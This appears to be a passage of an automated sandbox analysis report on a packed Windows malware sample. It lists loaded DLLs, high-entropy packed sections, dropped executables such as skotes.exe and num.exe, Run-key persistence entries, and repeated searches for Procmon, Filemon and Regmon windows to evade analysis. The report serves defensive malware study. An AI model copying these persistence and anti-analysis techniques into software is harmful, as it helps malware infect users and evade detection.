Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2985472 > 1048576
Source: file.exe Static PE information: Raw size of hzcsxlrx is bigger than: 0x100000 < 0x2ad400
Source: Binary string: my_library.pdbU source: 76bf5a4dba.exe, 00000014.00000003.2307921520.0000000004D7B000.00000004.00001000.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348423588.000000000034C000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: my_library.pdb source: 76bf5a4dba.exe, 00000014.00000003.2307921520.0000000004D7B000.00000004.00001000.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348423588.000000000034C000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000003.1531142998.0000000004990000.00000004.00001000.00020000.00000000.sdmp, M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000002.1667557254.00000000000C2000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Unpacked PE file: 10.2.M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.c0000.0.unpack :EW;.rsrc:W;.idata :W;fbnfxrsu:EW;rjcetyim:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Unpacked PE file: 11.2.4XW8W5G3AUTSGA2M5UZH7L9.exe.290000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 12.2.skotes.exe.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 13.2.skotes.exe.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cicynwpg:EW;whvjoyjd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Unpacked PE file: 19.2.100bc97ff1.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;hzcsxlrx:EW;hrhicodq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hzcsxlrx:EW;hrhicodq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Unpacked PE file: 20.2.76bf5a4dba.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ksqqhkwn:EW;kdggtfho:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ksqqhkwn:EW;kdggtfho:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Unpacked PE file: 21.2.100bc97ff1.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;hzcsxlrx:EW;hrhicodq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hzcsxlrx:EW;hrhicodq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Unpacked PE file: 40.2.76bf5a4dba.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ksqqhkwn:EW;kdggtfho:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ksqqhkwn:EW;kdggtfho:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: test.exe.17.dr Static PE information: real checksum: 0x0 should be: 0x5e46a
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: real checksum: 0x2cd5fa should be: 0x2cf7a9
Source: num[1].exe.17.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: real checksum: 0x1d3ce8 should be: 0x1cefd4
Source: random[1].exe.17.dr Static PE information: real checksum: 0x2daf14 should be: 0x2e6ba8
Source: skotes.exe.11.dr Static PE information: real checksum: 0x1d3ce8 should be: 0x1cefd4
Source: random[1].exe0.17.dr Static PE information: real checksum: 0x20d6bc should be: 0x21467e
Source: num.exe.17.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: real checksum: 0x2cd5fa should be: 0x2cf7a9
Source: 100bc97ff1.exe.17.dr Static PE information: real checksum: 0x2daf14 should be: 0x2e6ba8
Source: file.exe Static PE information: real checksum: 0x2daf14 should be: 0x2e6ba8
Source: test[1].exe.17.dr Static PE information: real checksum: 0x0 should be: 0x5e46a
Source: 76bf5a4dba.exe.17.dr Static PE information: real checksum: 0x20d6bc should be: 0x21467e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: hzcsxlrx
Source: file.exe Static PE information: section name: hrhicodq
Source: file.exe Static PE information: section name: .taggant
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name:
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name: .idata
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name: fbnfxrsu
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name: rjcetyim
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name: .taggant
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name:
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: .idata
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name:
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: cicynwpg
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: whvjoyjd
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.11.dr Static PE information: section name:
Source: skotes.exe.11.dr Static PE information: section name: .idata
Source: skotes.exe.11.dr Static PE information: section name:
Source: skotes.exe.11.dr Static PE information: section name: cicynwpg
Source: skotes.exe.11.dr Static PE information: section name: whvjoyjd
Source: skotes.exe.11.dr Static PE information: section name: .taggant
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name: hzcsxlrx
Source: random[1].exe.17.dr Static PE information: section name: hrhicodq
Source: random[1].exe.17.dr Static PE information: section name: .taggant
Source: 100bc97ff1.exe.17.dr Static PE information: section name:
Source: 100bc97ff1.exe.17.dr Static PE information: section name: .idata
Source: 100bc97ff1.exe.17.dr Static PE information: section name: hzcsxlrx
Source: 100bc97ff1.exe.17.dr Static PE information: section name: hrhicodq
Source: 100bc97ff1.exe.17.dr Static PE information: section name: .taggant
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: .rsrc
Source: random[1].exe0.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: ksqqhkwn
Source: random[1].exe0.17.dr Static PE information: section name: kdggtfho
Source: random[1].exe0.17.dr Static PE information: section name: .taggant
Source: 76bf5a4dba.exe.17.dr Static PE information: section name:
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: .rsrc
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: .idata
Source: 76bf5a4dba.exe.17.dr Static PE information: section name:
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: ksqqhkwn
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: kdggtfho
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: .taggant
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name:
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name: .idata
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name: fbnfxrsu
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name: rjcetyim
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A708 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011388B7 push eax; ret 0_3_011388C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011388B3 push eax; ret 0_3_011388C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011388B3 push eax; ret 0_3_011388C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0112F0F1 push ds; ret 0_3_0112F0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01141F4A push ebx; ret 0_3_01141F91
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113F297 push edx; iretd 0_3_0113F299
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011388B3 push eax; ret 0_3_011388C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011388B3 push eax; ret 0_3_011388C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0113A700 push edx; iretd 0_3_0113A70D
Source: file.exe Static PE information: section name: entropy: 7.970847626312372
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.0.dr Static PE information: section name: entropy: 7.7642385647424526
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: entropy: 7.980694249492091
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: section name: cicynwpg entropy: 7.954903561808911
Source: skotes.exe.11.dr Static PE information: section name: entropy: 7.980694249492091
Source: skotes.exe.11.dr Static PE information: section name: cicynwpg entropy: 7.954903561808911
Source: random[1].exe.17.dr Static PE information: section name: entropy: 7.970847626312372
Source: 100bc97ff1.exe.17.dr Static PE information: section name: entropy: 7.970847626312372
Source: random[1].exe0.17.dr Static PE information: section name: ksqqhkwn entropy: 7.953429987583825
Source: 76bf5a4dba.exe.17.dr Static PE information: section name: ksqqhkwn entropy: 7.953429987583825
Source: Q5PCC4NA5LRKC8PQDTEQRA.exe.19.dr Static PE information: section name: entropy: 7.7642385647424526
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\test[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File created: C:\Users\user\AppData\Local\Temp\Q5PCC4NA5LRKC8PQDTEQRA.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76bf5a4dba.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee3f3c2bda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 100bc97ff1.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Window searched: window name: PROCMON_WINDOW_CLASS
